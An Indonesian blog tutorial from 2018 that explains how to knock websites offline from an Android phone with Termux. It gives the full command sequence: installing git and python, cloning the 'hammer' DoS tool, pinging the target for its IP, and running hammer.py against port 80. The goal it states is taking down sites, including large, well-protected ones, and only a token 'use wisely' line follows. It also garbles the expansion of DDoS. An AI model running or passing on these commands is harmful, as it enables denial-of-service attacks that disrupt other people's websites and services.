Senin, 05 November 2018

Cara Melakukan DDOS Termux via Android Terbaru 100% Berhasil


Melakukan take down atau melumpuhkan sebuah Website memang agak sulit untuk dilakukan, apalagi jika website target yang ingin kita lumpuhkan itu web besar, yang memiliki sistem keamanan dan kekebalan yang kuat.

Namun, bukan berarti tidak mungkin. Anda tetap bisa melakukan serangan tersebut dengan cara menggunakan metode DDOS termux. Sebelumnya, apakah Anda sudah tahu dengan DDOS? Jika belum, yuk kita bahas sedikit tentang DDOS.

DDOS atau Denial Distribute of Service adalah salah satu metode serangan yang sangat simpel untuk dilakukan, namun efeknya sangat berbahaya.

Secara sederhana, cara kerja DDOS adalah dengan menyerang sistem server dari web tersebut secara bertubi-tubi, sehingga situs web tersebut down dan tidak dapat diakses. Untuk melakukan DDOS sendiri, harus lah dengan team, minimal 10 orang.

Nah, pada kesempatan kali ini admin akan membagikan sedikit tutorial tentang cara melakukan DDOS lewat Termux dari Android. So, silahkan Anda simak saja how to nya dibawah ini.

Cara Melakukan DDOS lewat Termux dari Android

Untuk cara DDOS termux sebenarnya cukup mudah sekali untuk dilakukan, Anda hanya perlu mengikuti beberapa langkah-langkah berikut ini:

1. Pertama-tama silahkan Anda buka aplikasi Termux, jika belum punya, maka silahkan Anda download terlebih dahulu di sini atau di google.

2. Selanjutnya install git dan juga python dengan perintah berikut:

pkg install git / pkg install python

3. Kemudian kita klon kan alat DDOS nya dan juga buka dir alat DDOS nya dengan perintah berikut:

git clone http://github.com/cyweb/hammer / cd hammer

4. Untuk cara menggunakan alat DDOS hammer, silahkan Anda masuk ke dalam dir hammer, kemudian jalankan perintah berikut untuk mengetahui ip target kita.

ping urltargetkalian.com

5. Jika Anda sudah mengetahui ip target tersebut, maka kembali ke dir hammer, lalu mulai untuk melakukan serangan DDOS termux dengan menjalankan perintah berikut:

python3 hammer.py -s ip target -p 80 -t 135

Keterangan: -s adalah untuk ip target, -p adalah untuk port, -t adalah untuk mengirim kan data kita ke situs tersebut.

Gimana mhanx? Mudah bukan?

Btw, gunakanlah tutorial DDOS termux ini dengan bijak, dan jangan gunakan tutorial ini untuk hal yang dapat merugikan orang lain. Jadikan artikel ini sebagai referensi dan penambah wawasan Anda.

Demikianlah yang dapat admin bagikan kali ini tentang Cara Melakukan DDOS Termux via Android. Jika ada pertanyaan, maka bertanyalah pada kolom komentar dibawah. Semoga bermanfaat dan terima kasih, #Respect

Load comments